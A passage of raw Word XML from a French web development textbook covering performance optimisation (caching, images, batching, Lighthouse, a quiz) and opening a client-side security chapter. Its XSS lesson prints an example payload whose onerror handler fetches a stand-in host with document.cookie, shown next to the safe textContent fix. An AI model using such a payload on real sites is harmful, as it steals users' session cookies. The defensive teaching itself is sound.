          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois politiques de cache · http</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Fichiers versionnés : cache long</w:t>
        <w:br/>
        <w:t>Cache-Control: public, max-age=31536000, immutable</w:t>
        <w:br/>
        <w:br/>
        <w:t># HTML : revalidation systématique</w:t>
        <w:br/>
        <w:t>Cache-Control: no-cache</w:t>
        <w:br/>
        <w:br/>
        <w:t># API : cache court et revalidation</w:t>
        <w:br/>
        <w:t>Cache-Control: public, max-age=60, stale-while-revalidate=30</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'empreinte dans le nom (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>app.3f2a91.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>) permet un cache d'un an : tout changement de contenu change le nom du fichier et force un nouveau téléchargement.</w:t>
      </w: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MESURER L'EFFET RÉEL</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Comparer avant/après avec le même réseau simulé et le même appareil. Une optimisation non mesurée est une hypothèse, pas un résultat.</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CINQ OPTIMISATIONS PAR ORDRE DE RENTABILITÉ</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Compresser et dimensionner les images.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Différer les scripts non critiques.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Activer la compression et le cache HTTP.</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Réduire le CSS bloquant au premier écran.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Supprimer les dépendances inutilisées.</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LCP, INP et CLS résument la performance perçue.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images sont le premier levier de poids.</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width</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> évitent les décalages de mise en page.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font-display: swap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> évite un texte invisible.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CSS et JavaScript peuvent bloquer le rendu.</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découpage de code évite de charger l'inutile.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cache long exige des noms de fichiers versionnés.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La page est rapide. La dernière ligne droite concerne la sécurité, le versionnement et la mise en production.</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33.1 — Réduire le poids d'une image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Une image de 2,4 Mo s'affiche dans une vignette de 320 pixels.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Proposez un format et une dimension.</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 xml:space="preserve">Ajoutez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>srcset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sizes</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Réservez l'espace.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 33.2 — Traiter une liste sans bloquer</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 tri de 50 000 éléments fige l'interface deux secondes.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 xml:space="preserve">Mesurez avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>performance.now()</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Découpez le traitement.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Comparez le ressenti.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 33.3 — Auditer une page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   MESURE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Lancez Lighthouse sur votre projet et relevez trois problèmes.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Notez le LCP et le CLS.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Identifiez la ressource la plus lourde.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Corrigez, puis remesurez.</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33.1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&lt;img</w:t>
        <w:br/>
        <w:t xml:space="preserve">  src="vignette-320.avif"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  srcset="vignette-320.avif 320w, vignette-640.avif 640w"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  sizes="(max-width: 700px) 90vw, 320px"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  width="320" height="320"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  alt="Portrait de l'autrice"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  loading="lazy"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  decoding="async"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une image affichée sur 320 pixels n'a pas besoin de 3000 pixels de large, même sur un écran dense : 640 pixels suffisent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> réservent la place et suppriment le décalage de mise en page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 33.2</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const debut = performance.now();</w:t>
        <w:br/>
        <w:t>const resultat = traiterParLots(donnees, transformer, 500);</w:t>
        <w:br/>
        <w:t>console.log(`Préparation : ${performance.now() - debut} ms`);</w:t>
        <w:br/>
        <w:br/>
        <w:t>function traiterParLots(items, fn, taille) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return new Promise((resolve) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const sortie = [];</w:t>
        <w:br/>
        <w:t xml:space="preserve">    let i = 0;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    (function lot() {</w:t>
        <w:br/>
        <w:t xml:space="preserve">      const fin = Math.min(i + taille, items.length);</w:t>
        <w:br/>
        <w:t xml:space="preserve">      for (; i &lt; fin; i += 1) sortie.push(fn(items[i]));</w:t>
        <w:br/>
        <w:t xml:space="preserve">      if (i &lt; items.length) requestAnimationFrame(lot);</w:t>
        <w:br/>
        <w:t xml:space="preserve">      else resolve(sortie);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    })();</w:t>
        <w:br/>
        <w:t xml:space="preserve">  });</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le découpage ne réduit pas le temps total, mais rend la main entre chaque lot : l'interface reste réactive.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>performance.now()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> fournit une mesure haute résolution, plus précise que </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Date.now()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 33.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un LCP élevé vient souvent d'une image non optimisée ou d'une police bloquante.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un CLS élevé vient d'images sans dimensions ou d'un contenu injecté en haut de page.</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Comparer deux rapports</w:t>
        <w:br/>
        <w:t>npx lighthouse http://localhost:8080 --output=json --output-path=avant.json</w:t>
        <w:br/>
        <w:t># ... optimisations ...</w:t>
        <w:br/>
        <w:t>npx lighthouse http://localhost:8080 --output=json --output-path=apres.json</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 mesure le LCP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La réactivité</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L'affichage du plus grand élément</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La stabilité visuelle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 poids total</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Quel attribut évite un décalage de mise en page sur une image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alt</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width</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>height</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loading</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decoding</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 xml:space="preserve">Que fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>font-display: swap</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Masque le texte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Affiche un substitut immédiatement</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Bloque le rendu</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Télécharge deux polices</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Quel attribut exécute un script sans bloquer l'analyse, en préservant l'ordre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async</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defer</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load</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type</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Pourquoi versionner les noms de fichiers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Pour la sécurité</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Pour permettre un cache long</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Pour réduire le poids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Pour le référencement</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Largest Contentful Paint mesure quand le contenu principal est visible.</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Les dimensions réservent l'espace avant le chargement.</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Le texte est visible tout de suite, puis remplacé par la police téléchargée.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>defer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> télécharge en parallèle et exécute après l'analyse, dans l'ordre.</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Un nom qui change à chaque modification permet de mettre en cache durablement sans risque de servir une ancienne version.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>34. Sécurité côté client</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Connaître les attaques qui visent le navigateur et les quelques réflexes qui en neutralisent la majorité.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 2 h 45 · Niveau : Intermédiaire · Prérequis : chapitre 33</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Identifier les trois grandes familles d'attaques web.</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Neutraliser une injection HTML et une injection SQL.</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Comprendre le rôle de la politique de sécurité du contenu.</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Protéger une session et un formulaire.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Intégrer la sécurité dans le cycle de développement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>34.1 Le modèle de menace</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un site front-end s'exécute dans un environnement hostile : l'utilisateur contrôle son navigateur, le réseau est observable, et toute donnée reçue peut être piégée. La sécurité consiste à réduire la surface d'attaque.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2540000"/>
            <wp:docPr id="44" name="Picture 44"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f42.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId66"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2540000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.42 — Trois surfaces d'attaque</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SURFACE D'ATTAQUE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Ensemble des points par lesquels un attaquant peut tenter d'entrer ou d'extraire des données.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>34.2 Injection HTML et XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une faille XSS consiste à faire exécuter du script hostile dans la page d'un autre utilisateur. Elle survient dès qu'une donnée non fiable est insérée comme du HTML.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>La faille la plus courante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Vulnérable : la donnée est interprétée comme du HTML</w:t>
        <w:br/>
        <w:t>const nom = new URLSearchParams(location.search).get("nom");</w:t>
        <w:br/>
        <w:t>resultat.innerHTML = `Bonjour ${nom}`;</w:t>
        <w:br/>
        <w:t>// URL : ?nom=&lt;img src=x</w:t>
        <w:br/>
        <w:t xml:space="preserve">  onerror="fetch('https://vol.example/?c='+document.cookie)"&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Sûr : texte brut</w:t>
        <w:br/>
        <w:t>resultat.textContent = `Bonjour ${nom}`;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.107 — Cinq contextes d'insertion</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44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Contexte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Danger</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2445"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Contenu HTML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3056"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Balise injectée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3514"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>textContent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="244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Attribut</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Guillemet cassé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="351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setAttribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2445"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3056"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>javascript:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3514"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Validation du protocole</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="244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CSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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url()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> piégée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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Classes statiques</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2445"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
